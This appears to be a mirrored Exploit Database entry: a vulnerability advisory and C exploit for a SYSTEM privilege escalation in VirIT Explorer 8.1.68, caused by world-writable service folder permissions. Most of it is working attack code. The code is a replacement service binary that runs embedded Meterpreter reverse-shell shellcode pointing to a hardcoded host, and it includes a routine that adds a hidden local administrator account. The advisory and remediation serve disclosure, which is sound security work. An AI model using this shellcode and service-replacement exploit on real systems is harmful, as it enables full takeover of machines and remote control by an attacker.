VirIT Explorer Lite & Pro 8.1.68 – Local Privilege Escalation

• Exploit Database
• 119 阅读

• 作者： Paolo Stagno
  日期： 2016-05-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39843/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198

  /* Full title: VirIT Explorer Lite & Pro v.8.1.68 Local Privilege Escalation (System)/Arbitrary Code Execution Exploit Author: Paolo Stagno - voidsec@voidsec.com Vendor Homepage: http://www.tgsoft.it Version: VirIT Explorer Lite & Pro v.8.1.68 Tested on: Windows 7 CVE: TBD CVSS v2: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:H/RL:U/RC:C) - https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=%28AV:L/AC:L/Au:S/C:C/I:C/A:C/E:H/RL:U/RC:C%29 Category: local exploits Platform: windows Security Risk: High Date add: 18/05/2016   === VirIT Explorer Lite & Pro v.8.1.68 Local Privilege Escalation (SYSTEM Privilege)/Arbitrary Code Execution   - Author: Paolo Stagno   Overview ========= Vir.IT eXplorer [1] is an AntiVirus, AntiSpyware and AntiMalware software made in Italy and developed by TG Soft S.a.s.   A major flaws exists in the last version of Vir.IT eXplorer, this vulnerability allow a local attacker, to execute arbitrary code in the context of the application with SYSTEM privilege.   Details ========== The flaw resides in the viritsvclite Service due to bad privileges for the main Vir.IT folder, by default, any user (even guest) will be able to replace, modify or alter the file. This would allow an attacker to inject code or replace the executable and have it run in the context of the system.   This would allow a complete compromise of the system on which the antivirus was installed; an attacker can replace the executable, reboot the system and it would then compromise the machine. As NT AUTHORITY\SYSTEM is the highest privilege level on a Windows machine, this allows a total control and access to the system.   Services: viritsvclite Folder: %SYSTEMDRIVE%\VEXPLite Executable: %SYSTEMDRIVE%\VEXPLite\viritsvc.exe   [2] icacls.exe VEXPLite C:\VEXPLite Everyone:(OI)(CI)(F) <=================== Vulnerable BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(RX) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)   Successfully processed 1 files; Failed processing 0 files   icacls.exe viritsvc.exe viritsvc.exe Everyone:(I)(F) <=================== Vulnerable BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M)   Successfully processed 1 files; Failed processing 0 files   With this flaws in mind I wrote the exploit which is able to obtain NT AUTHORITY\SYSTEM via a meterpreter shell.   Exploit ========== https://gist.github.com/VoidSec/9971092829dd1fec146e1595843aae65 https://www.youtube.com/watch?v=5a09efEvjTk (video proof)   Remediation ========== Remove the permissions on the VEXPLite folder, all of its files and on the viritsvc.exe Service executables to allow only privileged users to alter the files, apply vendor patch once distributed.   Footnotes ========== [1] http://www.tgsoft.it/english/prodotti_eng.asp [2] https://technet.microsoft.com/en-us/library/cc753525%28WS.10%29.aspx ---   */ #include <windows.h> #include <stdio.h>   #define small_sleep 5000 #define big_sleep 180000   SERVICE_STATUS ServiceStatus; SERVICE_STATUS_HANDLE hStatus;   void ServiceMain(int argc, char **argv); void ControlHandler(DWORD request); typedef short (CALLBACK * FuncType) (LPCTSTR);   /*Meterpreter reverse payload (windows/meterpreter/reverse_tcp), replace with your own*/ unsigned char r_shell[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" "\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xc0\xa8\x01\x8a\x68\x02" "\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" "\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00" "\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83" "\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a" "\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57" "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00" "\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68" "\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff" "\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" "\x53\xff\xd5";   int Spawn_Shell(){ //Spawn the reverse shell int (*func)(); func = (int (*)()) r_shell; (int)(*func)(); }   int Add_Admin(){ //ADD VoidSec:secret to Local Administrators system("net user VoidSec secret /ADD"); system("net localgroup Administrators VoidSec /ADD"); return 0; }   int main(){ SERVICE_TABLE_ENTRY ServiceTable[2]; ServiceTable[0].lpServiceName = "viritsvclite"; ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION) ServiceMain; ServiceTable[1].lpServiceName = NULL; ServiceTable[1].lpServiceProc = NULL; StartServiceCtrlDispatcher(ServiceTable);   return 0; }   void ServiceMain(int argc, char **argv) { ServiceStatus.dwServiceType = SERVICE_WIN32; ServiceStatus.dwCurrentState = SERVICE_START_PENDING; ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN; ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwServiceSpecificExitCode = 0; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; hStatus = RegisterServiceCtrlHandler("viritsvclite", (LPHANDLER_FUNCTION) ControlHandler); ServiceStatus.dwCurrentState = SERVICE_RUNNING; SetServiceStatus(hStatus, &ServiceStatus); //Big sleep (3m), let Windows start Network, DHCP etc. Sleep(big_sleep); Spawn_Shell(); //Add_Admin(); //Let our service run instead of kill it (only works with Add_Admin, Spawn_Shell will kill it on exit) /*while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) { Sleep(small_sleep); }*/ return; }   void ControlHandler(DWORD request) { switch (request) { case SERVICE_CONTROL_STOP: ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus(hStatus, &ServiceStatus); return; case SERVICE_CONTROL_SHUTDOWN: ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus(hStatus, &ServiceStatus); return; default: break; } SetServiceStatus(hStatus, &ServiceStatus); return; }